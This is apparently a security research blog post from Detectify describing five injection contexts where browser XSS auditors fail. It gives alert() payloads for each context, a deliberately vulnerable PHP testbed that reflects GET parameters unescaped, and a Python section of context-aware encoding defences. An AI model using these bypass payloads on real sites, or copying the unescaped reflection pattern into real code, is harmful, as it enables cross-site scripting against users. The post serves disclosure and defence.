5 contexts where the XSS Auditor won’t help you

Mathias Karlsson

While implementing a new JavaScript engine into Detectify, we discovered that the XSS auditors in modern browsers weren't as good at catching special cases as we thought. Since our previous post on bypassing the Chrome XSS Auditor got such a good response, we thought this would make a fitting follow-up post.

Context 1:

<script src="[Injection]"></script>

Injection: data:,alert(1)

<script src="data:,alert(1)"></script>

Works in: Chrome, Opera, Firefox, IE

Context 2:

<img src="notfound" onerror="[Injection]" />

Injection: alert(2)

<img src="notfound" onerror="alert(2)" />

Works in: Chrome, Opera, Firefox, IE

Context 3:

<script>var string = "[Injection]"</script>

Injection: "*alert(3)*"

<script>var string = ""*alert(3)*""</script>

Works in: Chrome, Opera, Firefox

Context 4:

<iframe src="[Injection]"></iframe>

Injection: javascript:alert(4)

<iframe src="javascript:alert(4)"></iframe>

Works in: Chrome, Opera, Firefox

Context 5:

Some [Injection] text on the same line [Injection]

Injection: %0aalert(5)</script><script>-->

Some 
alert(5)</script><script>--> text on the same line 
alert(5)</script><script>-->

Works in: Chrome, Opera, Firefox
Note that context 5 only works with the "-->" style comment, and won't work with "/*" or "//" style comments.

Testbed

<html>
<script src="<?=@$_GET[1]?>"></script>
<script>var string = "<?=@$_GET[2]?>"</script>
<iframe src="<?=@$_GET[3]?>"></iframe>
<img src="x" onerror=<?=@$_GET[4]?> />
Some <?=@$_GET[5]?>text on the same line<?=@$_GET[5]?>
</html>

Test URI: ?1=data:,alert(1)&2="*alert(2)*"&3=javascript:alert(3)&4=onerror=alert(4)&5=%0aalert(5)</script><script>-->

In defense of the developers of the auditors/filters, these filters are only supposed to be a mitigation, and “as good as possible”. While it's no secret that they don't catch everything, we still thought we would share the specific contexts we had discovered.
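The server-side counterpart to the testbed above, as an added example that is not part of the original post: a small Python helper that encodes a value for each of the contexts listed before it is reflected. For the two src= contexts it uses a scheme allow list instead of encoding, because data: and javascript: are valid URLs and no amount of escaping makes them inert. Function names and the http(s)-only allow list are assumptions of this example.

```python
import html
import json
from urllib.parse import urlsplit

# Contexts 1 and 4: a value reflected into a src= attribute. Encoding alone
# does not help, since data:,alert(1) and javascript:alert(4) are well-formed
# URLs; the scheme is checked against an allow list before the value is used.
ALLOWED_SCHEMES = {"http", "https"}  # assumption: only absolute http(s) URLs


def src_url(value: str) -> str:
    """Return an attribute-safe http(s) URL, or about:blank for anything else."""
    if urlsplit(value.strip()).scheme.lower() not in ALLOWED_SCHEMES:
        return "about:blank"
    return html.escape(value, quote=True)


# Context 3: a value inside a JavaScript string literal. json.dumps escapes the
# quotes, so "*alert(3)*" cannot terminate the literal, and < and > are escaped
# so a </script> inside the value cannot close the surrounding script block.
def js_string(value: str) -> str:
    body = json.dumps(value)[1:-1]
    return body.replace("<", "\\u003c").replace(">", "\\u003e")


# Context 5: a value in an HTML text node. Entity-encoding < and > turns the
# </script><script>--> part of the payload into inert text; the %0a newline
# is harmless once it cannot start a new tag.
def html_text(value: str) -> str:
    return html.escape(value, quote=False)


# Context 2 (onerror="[Injection]") has no safe encoder: an event handler
# attribute is executed as JavaScript, so user data must never be placed there.


def render(script_src: str, js_value: str, frame_src: str, text: str) -> str:
    """Assemble the post's test page with each value encoded for its context."""
    return (
        f'<script src="{src_url(script_src)}"></script>\n'
        f'<script>var string = "{js_string(js_value)}"</script>\n'
        f'<iframe src="{src_url(frame_src)}"></iframe>\n'
        f"Some {html_text(text)} text on the same line {html_text(text)}"
    )
```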

Mathias Karlsson

Application Engineer/Co-Founder, Detectify
